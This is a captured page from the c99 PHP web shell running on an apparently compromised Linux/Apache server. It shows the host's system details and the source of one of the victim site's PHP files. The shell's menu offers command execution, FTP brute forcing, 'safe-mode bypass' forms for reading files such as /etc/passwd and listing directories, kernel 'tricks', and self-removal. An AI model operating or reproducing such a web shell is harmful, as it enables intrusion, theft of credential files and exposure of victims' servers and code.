!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/   drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pagebody.php (3.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |


Lang = ($lang=="") ? "th" : $GLOBALS['sysLang'];		//querystring when select language					
	if ($StID<>"") $oU->StID = $StID;			//querystring when selectmenu;
	if ($GpID<>"") $oU->GpID = $GpID;			//querystring when selectmenu;
	if ($MnID<>"") $oU->MnID = $MnID;			//querystring when selectmenu;
	$oU->GetRightsByMenu();		
}else {
	$sessionID = session_id();
	if ($oU->SessionID<>$sessionID){
		if ($_POST['refFromLogoutPage']==""){
			echo "";
            header("Location: logout.php");
			exit();
		}
	}
}
include_once("./classes/clsTable.php");
include_once("./classes/clsForm.php");
//============================================================================

function pageHeader(){
	global $oU;
	echo "\n";
	echo "\n";
	echo "SYSTEM\n";
	echo "\n";
	echo "\n";
	echo "\n";
	echo "\n";
	echo "\n";
	echo "\n";
	echo "\n";
	echo "\n";
	echo "\n";
    echo "\n";
	echo "\n";
	echo "\n";
	//==Banner at top.===========================
	//echo "";
	//echo "\n";
	//==menu================================
	echo "\n"; 
		echo "\n";
	//==user info=============================
	echo "\n";
		echo "\n";
	//============================================================================
	//start working in this td
	//============================================================================
	echo "\n";
		echo "
\n";	
		//include  $GLOBALS["sysUmPath"]."/menu.php?UsID=".$oU->userID."&StID=".$oU->StID."&"."GpID=".$oU->GpID."&WgID=".$oU->WgID;
        $UsID=$oU->userID;
        $StID=$oU->StID;
        $GpID=$oU->GpID;
        $WgID=$oU->WgID;
        include("menu.php");
		echo "
\n";	
		echo "\n";
			echo "\n";
			echo "\n";
			echo "\n";
		echo "
".
					"เข้าสู่ระบบวันที่   ".$GLOBALS["sysDate"]." ".
					"   ".
					$oU->userName."  ".
					"";
					if ($oU->userLogin=="")
						echo "";
					else 
						echo "�͡�ҡ�к�";
					echo "  
\n";
		echo "
\n";		
}

?>
bool(false)




:: Command execute ::


Enter: 
 
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ Read-Only ]






:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--